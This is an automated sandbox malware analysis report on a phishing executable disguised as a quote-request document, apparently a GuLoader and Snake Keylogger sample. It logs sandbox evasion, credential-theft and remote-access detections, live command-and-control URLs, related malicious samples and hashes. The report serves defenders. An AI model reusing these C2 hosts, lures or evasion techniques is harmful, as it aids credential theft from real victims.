      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597172Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 597063Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596938Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596828Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596719Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596594Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596484Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596375Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596266Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596156Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 596047Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595938Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595813Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595703Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595594Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595469Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595360Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595235Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 595110Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594985Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594860Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeThread delayed: delay time: 594235Jump to behavior
      Source: Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E8E000.00000004.00000020.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeAPI call chain: ExitProcess graph end nodegraph_0-4796
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeAPI call chain: ExitProcess graph end nodegraph_0-4800
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeProcess created: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe "C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeQueries volume information: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C
      Source: C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      11
      Process Injection
      11
      Masquerading
      OS Credential Dumping211
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      1
      Disable or Modify Tools
      LSASS Memory41
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
      Virtualization/Sandbox Evasion
      Security Account Manager1
      Application Window Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS1
      System Network Configuration Discovery
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information
      Cached Domain Credentials214
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Request for Quote and Collaboration Docs.exe13%ReversingLabs
      Request for Quote and Collaboration Docs.exe100%AviraHEUR/AGEN.1337946
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      172.217.19.174
      truefalse
        high
        drive.usercontent.google.com
        142.250.181.97
        truefalse
          high
          reallyfreegeoip.org
          172.67.177.134
          truefalse
            high
            s-part-0035.t-0009.t-msedge.net
            13.107.246.63
            truefalse
              high
              checkip.dyndns.com
              132.226.247.73
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/false
                    high
                    https://reallyfreegeoip.org/xml/8.46.123.228false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://aborters.duckdns.org:8081Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://drive.google.com/Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E38000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://anotherarmy.dns.army:8081Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://reallyfreegeoip.orgRequest for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037822000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://drive.usercontent.google.com/gRequest for Quote and Collaboration Docs.exe, 00000005.00000003.2437297112.0000000006EA0000.00000004.00000020.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://reallyfreegeoip.orgRequest for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037849000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.usercontent.google.com/Request for Quote and Collaboration Docs.exe, 00000005.00000003.2437297112.0000000006EA0000.00000004.00000020.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2605413216.0000000006E8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://reallyfreegeoip.org/xml/8.46.123.228$Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://checkip.dyndns.orgRequest for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037849000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://checkip.dyndns.comRequest for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378A6000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.00000000378B4000.00000004.00000800.00020000.00000000.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037899000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://nsis.sf.net/NSIS_ErrorErrorRequest for Quote and Collaboration Docs.exe, 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Request for Quote and Collaboration Docs.exe, 00000000.00000000.1342462043.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Request for Quote and Collaboration Docs.exe, 00000005.00000000.2235036869.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequest for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://varders.kozow.com:8081Request for Quote and Collaboration Docs.exe, 00000005.00000002.2626470470.0000000037751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                172.217.19.174
                                                drive.google.comUnited States
                                                15169GOOGLEUSfalse
                                                142.250.181.97
                                                drive.usercontent.google.comUnited States
                                                15169GOOGLEUSfalse
                                                172.67.177.134
                                                reallyfreegeoip.orgUnited States
                                                13335CLOUDFLARENETUSfalse
                                                132.226.247.73
                                                checkip.dyndns.comUnited States
                                                16989UTMEMUSfalse
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1567432
                                                Start date and time:2024-12-03 15:21:16 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 13s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Request for Quote and Collaboration Docs.exe
                                                Detection:MAL
                                                Classification:mal96.troj.evad.winEXE@3/8@4/4
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 92%
                                                • Number of executed functions: 86
                                                • Number of non-executed functions: 82
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Request for Quote and Collaboration Docs.exe, PID 2052 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Request for Quote and Collaboration Docs.exe
                                                TimeTypeDescription
                                                09:24:02API Interceptor89x Sleep call for process: Request for Quote and Collaboration Docs.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                172.67.177.134Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                    kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                      Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                              QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  swift.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    132.226.247.73IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • checkip.dyndns.org/
                                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • checkip.dyndns.org/
                                                                    RYSUNEK_.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • checkip.dyndns.org/
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    checkip.dyndns.comIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 132.226.247.73
                                                                    Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 193.122.130.0
                                                                    #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 193.122.130.0
                                                                    kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 193.122.130.0
                                                                    P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 158.101.44.242
                                                                    s-part-0035.t-0009.t-msedge.netRFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                    • 13.107.246.63
                                                                    uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    NLNIOm0w6y.exeGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    NEW ORDER #233.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.107.246.63
                                                                    629105847300XXX024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 13.107.246.63
                                                                    Oder Request &Company profile.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.107.246.63
                                                                    0200011080.xlsGet hashmaliciousUnknownBrowse
                                                                    • 13.107.246.63
                                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.107.246.63
                                                                    reallyfreegeoip.orgIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.67.152
                                                                    Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSRef#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.67.152
                                                                    Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                    • 188.114.96.6
                                                                    BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                    • 172.67.194.230
                                                                    SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                    • 188.114.97.6
                                                                    2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                    • 172.67.194.230
                                                                    Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                    • 172.67.201.49
                                                                    UTMEMUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 132.226.247.73
                                                                    Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 132.226.8.169
                                                                    tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 132.226.247.73
                                                                    Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                    • 132.226.8.169
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    54328bd36c14bd82ddaa0c04b25ed9adIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    37f463bf4616ecd445d4a1937da06e19IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    Curri.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    36244920cQPUT1.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    1013911.jsGet hashmaliciousFormBookBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    cHtIyrhXeG.lnkGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    HiDOalUAfc.lnkGet hashmaliciousUnknownBrowse
                                                                    • 142.250.181.97
                                                                    • 172.217.19.174
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\Users\user\AppData\Local\Temp\nsqF5EC.tmp\System.dllIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                          PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                              TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                ________.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        Process:C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1279115
                                                                                        Entropy (8bit):3.5160672418992087
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:7EI8rRdBWtXH9WBTYSg+j9aqbdZYq1c3XAI50cO1Ovsgca25SNXxutuu9G389+Mp:f8rRdxZYqEX9w1AlNctUHkWpKJ
                                                                                        MD5:54C5C9298E644EF95A649580A802E8A3
                                                                                        SHA1:F51A41356335649B58D28C4D9E4F78C8431AEB15
